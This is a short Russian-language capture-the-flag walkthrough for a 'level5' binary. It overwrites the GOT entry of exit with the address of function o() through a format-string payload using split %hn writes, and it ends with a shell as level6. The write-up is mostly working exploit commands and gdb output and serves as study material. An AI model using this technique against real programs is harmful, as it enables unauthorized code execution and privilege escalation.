задача крайне похожа на предыдущее упражнение, но теперь нам следует заменить
адрес функции exit из GOT таблицы на адрес функции o()
info functions exit
x/i 0x080483d0
   0x80483d0 <exit@plt>:	jmp    *0x8049838
info functions o
0x080484a4  o
функция ожидает увидеть аргумент теперь на 4 позиции:
r <<<$(python -c 'print "UUUU %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x"')
UUUU 200 b7fd1ac0 b7ff37d0 55555555 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825
разделим число на два при помощи использования %hn, тогда
первая часть 0804 (2052-8=2044), а вторая 84a4(33956-2052=31904)
не забывает little endian, значит они %5$hn и 4 соответственно, итак:
python -c 'print "\x38\x98\x04\x08\x3a\x98\x04\x08" + "%2044x%5$hn%31904x%4$hn"' > /tmp/exploit5
cat /tmp/exploit5 /dev/stdin | ./level5
whoami
level6
